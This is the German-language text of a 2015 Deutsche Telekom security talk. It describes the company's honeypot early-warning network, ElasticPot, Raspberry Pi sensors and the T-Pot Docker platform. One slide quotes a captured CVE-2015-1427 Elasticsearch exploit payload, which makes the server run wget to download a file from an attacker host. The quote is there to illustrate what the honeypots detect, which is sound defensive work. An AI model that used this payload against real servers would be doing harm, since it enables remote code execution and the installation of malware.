HONEYPOTS @ DTAG: Doing things the right way...
MARCO OCHSE – DR. MARKUS SCHMALL, GROUP SECURITY SERVICEJUGS Meeting, 15. Oktober 2015
INHALTE
22.10.15 2
§ Wer sind wir
§ Historie
§ Hintergründe
§ Anwendungsfälle
§ Frühwarnung
§ T-POT / Docker
WER SIND WIR
22.10.15 3
§ Group Security Service § Senior Experte Sicherheit in Office &
Portalsystemen § T-Pot Main Entwickler§ Mobile-Gadget-Nerd
Marco Ochse
§ Group Security Service§ Leiter Application Security & Testing§ Frühwarnsystem & Honeypot-Development § Rapid PrototyperJ
Markus Schmall
22.10.15 4
Wann wurde der erste Honeypot gebaut ?
WANN WURDE DER ERSTE HONEYPOT GEBAUT ?
22.10.15 5
1988 / 1989 – Clifford Stoll
HONEYNET PROJECT
22.10.15 6
§ Gegründet 1999 von Lance Spitzner
§ Vereinigung von Honeypot Entwicklern (Glastopf, Honeytrap, Dionaea, …) und Betreibern (u.a. Shadowserver Foundation, DTAG …)
§ Autor der “Know your Enemy” Reihe§ https://www.honeynet.org/challenges
AUSGANGSLAGEABUSE / IP Speicherung
§ > 2.000.000 Hinweise pro Monat§ >100000 Emails an Kunden pro Monat
Wichtig: Ohne sieben Tage IP Speicherung ist keine Kundeninformation möglich.
HINWEISE SEIT JAHREN AUF HOHEM NIVEAU
22.10.15 7
HINWEISGEBER
FRÜHWARNUNGANGRIFFSERKENNUNG DURCH HONEYPOTS
§ Weltweit verteiltes Sensornetzwerk aus etwa 180 Honeypots und Application-Level-Firewalls
§ Platzierung in Rechenzentren, DSL Anschlüssen, Mobile IP Bereichen…)
§ Sensoren basieren auf Open Source Software wie kippo, honeytrap, dionaea, glastopf, mysqlpot, servletpot, nodepot, elasticpot, modsecurity…
§ Simulation diverser Dienste wie mysql, mssql, http, ftp, ssh, sip, smb, elasticsearch, smtp …
§ Simulation bekannter Schwachstellen, teilweise selbstlernend
§ Übermittlung an zentrales Frühwarnsystem
ANGRIFFE IN ECHTZEIT AUFNEHMEN
22.10.15 8
CYBER-ANGRIFFE NACHVOLLZIEHEN
FRÜHWARNUNGECHTZEITLAGEBILDER DURCH FRÜHWARNSYSTEM
VERTEILTES SENSORNETZ
§ Zentrales Auswertesystem („Early WarningSystem“) nimmt Sensordaten entgegen und wertet Angriffe aus
§ Partner aus der Industrie, Forschung und der öffentlichen Hand angeschlossen
§ Vollautomatisierte Weiterverarbeitung der Angriffsdaten
§ Ausleitung von Schadsoftware an Antiviren-Industrie
§ Forschung zusammen mit Intel / Ben Gurion / IL§ Erstellung von Statistiken§ Generierung von Alarmen / Benachrichtigungen§ ca. 2000 unterschiedliche Angreifer/Tag§ bis zu 4.000.000 Angriffe/Tag
ZENTRALE AUSWERTUNG UND VERARBEITUNG
22.10.15 9
FRÜHWARNUNGBEISPIEL ELASTICSEARCH HONEYPOT
22.10.15 10
CVE-2015-1427 (
{"query":+{"filtered":+{"query":+{"match_all":+{}}}},+"script_fields":+{"exp":+{"script":+”import+java.util.*;
import+java.io.*;
String+str+=+\"\";BufferedReader+br+=+new+BufferedReader(new+InputStreamReader(Runtime.getRuntime().exec(\"wget+-O+/tmp/Sekey+http://222..x.y.z:5665/Sekey\").getInputStream()));
StringBuilder+sb+=+new+StringBuilder();
while((str=br.readLine())!=null){sb.append(str);sb.append(\"\r\n\");}sb.toString();"}},+"size":+1}
ElasticPot: Grails2.5.1, Redis DB, Alphaversion auf github (https://github.com/schmalle/ElasticPot)
FRÜHWARNUNG DETAILS PLATTFORM
22.10.15 11
WebService Interface (PUT ALARMS, GET BAD IPS, GET NEW ALARMS)
§ Grails Anwendung im Tomcat Container§ Software Loadbalancing auf Basis Apache 2.4§ DB Interface auf Basis OR Mapper§ Native Elastic Search API§ CVE Detektion
Datenbank
§ Initial MySQL, jetzt Mongo DB und ElasticSearch im Cluster
Objekte
§ Alarm (IP, Datum)§ Request (HTTP Request, binary, )§ Peer (Honeypot)
Apache / Tomcat
DB Layer
FRÜHWARNUNG DETAILS PLATTFORM (II)
22.10.15 12
FrontEnd / Management UI
Technologien
§ Grails 2 (+ Spring Security)§ JQuery§ Bootstrap 3
Informationen / SDK
§ https://github.com/dev-t-sec/BadIPFetch (SDK für Abfrage Bad IPs)§ dtag-dev-sec.github.io
FRÜHWARNUNGIDEE 2013: GÜNSTIG SENSORBREITE ERHÖHEN
RASPBERRY PI
§ Sensor-Appliances auf Basis von Low-CostHardware „RaspberryPi“
§ Vorkonfigurierte System Images mit HoneypotSoftware / Raspbian ohne X
§ Zwei Simulationstypen / Honeypot-Setups
§ 80 vorkonfigurierte Geräte an Landesgesellschaften verteilt
§ Minimale Kosten§ Plug'n‘Play
§ Zentrales Management via Puppet
HONEYPOT APPLIANCES
22.10.15 13
FRÜHWARNUNG PUPPET
22.10.15 14
node default{
include ewsposterinclude configpuppetinclude ewsposter_beta
}
class configpuppet{
file { '/etc/puppet/puppet.conf': ensure => present,owner => "root", group => "root", source => "puppet://$d/puppet.conf"
}}
CYBER-AIKIDO
Das Ziel beim Aikidō ist, die Kraft […] abzuleiten (Abwehr) und dieselbe Kraft intelligent zu nutzen, um den Gegner vorübergehend angriffsunfähig zu machen (Absicherung), ohne ihn dabei schwer zu verletzen. Quelle: Wikipedia
FRÜHWARNUNG ZIEL: INFORMATIONEN AUS ANGRIFFEN GENERIEREN
22.10.15 17
SICHERHEITSTACHO.EU
NUTZBARMACHUNG VON HONEYPOT DATEN
FRÜHWARNUNG ZIEL: EIGENE SYSTEME SCHÜTZEN
22.10.15 19
§ Vor existierenden Webserver wird Modul installier t, welches auftreffende Anfragen abfängt und die IP Adresse mit einer Blackliste vergleicht und bei positivem Befund wird auf eine CaptchaSeite geleitet.
§ User kann sich selbst freischalten.
§ Realisierung als HTTP Servlet Filter
§ Vorteil: Keine Aussperrung legitimer Benutzer
Use CaseEINLASSKONTROLLE DYNAMIC WEB DEFENDER
FRÜHWARNUNG ZIEL: KUNDEN SCHÜTZEN
§ Erscheinen IP Adressen aus DTAG IP Bereichen lösen diese eine Information des Abuse Teams aus
§ DTAG Abuse Team übernimmt die Information von Endkunden (DSL, Businessendkunden und Privatendkunden) bei Verdacht auf Infektion von Rechnersystemen
§ Durchschnittlich 100.000 Anschreiben an DSL Endkunden pro Monat
§ Alarmierungen von Partnern bei Zugriffen aus deren Netzen auch für Kundeninformation nutzbar
KUNDENINFORMATION DURCH ABUSE-TEAM
22.10.15 20
§ Der DSL Router warnt den Benutzer im heimischen Netzwerk, wenn die öffentliche IP Adresse des Routers („public IP“) im Frühwarnnetz aufgefallen ist
§ Zeitnahe Kundeninformation über Infektionen im heimischen Netz
§ Technische Realisierung im Router § IFA 2013: OpenRouter§ 2016: Launch vor Kunde
AUSBLICK: DSL HOME USER PROTECTION
2014 – Umdenken
T-POT
UMDENKENBESTANDSAUFNAHME
§ Full blown, low-cost, Vir tualisierung … § Performance, Architektur Support,
§ RZ security policies, NetzwerkTrennung§ Begrenzte Anzahl von Honeypots pro Gerät
HARDWARE
22.10.15 22
§ Debugging Aufwändungen, Hauptsächlichmanuell
§ Config Management aufwendig (recipes)§ Externer Zugriff kritisch und notwendig§ Deployments / Defragmentation unvermeidbar
WARTUNG
§ Hauptsächlich händisch, Unterstützung nötig§ Keine “One-4-All-Lösung”, Setup personalisiert§ Gemischte Erfahrungen und Eindrücke mit
Management Tools
DEPLOYMENT
§ Zentrale Datenhaltung mit großen Datenmengen§ Zeitaufwand durch manuelle Datenanalyse§ Jäger und Sammler => Intelligente Filter
DATEN AGGREGATION
UMDENKEN
UMDENKENEVOLUTION & INNOVATION
§ Multi Platform Support§ One-4-All-Lösung
§ Vir tuelle Umgebungen (VMWare, VBox, etc.)§ Cloud Support (EC2, AWS, Google Cloud, …)
HARDWARE
22.10.15 24
§ Automatische Updates§ Reduktion der Wartung auf Client (wenig>0)§ Selbstüberwachung§ Externer Zugriff nur optional
WARTUNG
§ (Halb)-Automatischer Installationsvorgang§ Reproduzierbarkeit der Installationen§ Community / Open Source Lösung§ Viele Honeypots gleichzeitig auf einer Instanz
DEPLOYMENT
§ Zentrale Datenverarbeitung (Sicherheitstacho)§ Zentrale UI (Community Dashboard)§ Lokale UI (ELK Stack)
DATEN AGGREGATION
T-POT: A MULTI-HONEYPOT PLATFORM
T-POT: A MULTI-HONEYPOT PLATFORM
22.10.15 26
T-POT: COMMUNITY DASHBOARD
22.10.15 27
INTERNATIONALERHONEYPOT ROLLOUT
http://community.sicherheitstacho.eu
T-POT BASIERT AUF DOCKER